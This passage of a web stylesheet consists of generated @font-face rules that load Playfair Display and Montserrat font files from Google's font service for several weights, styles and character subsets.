U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: 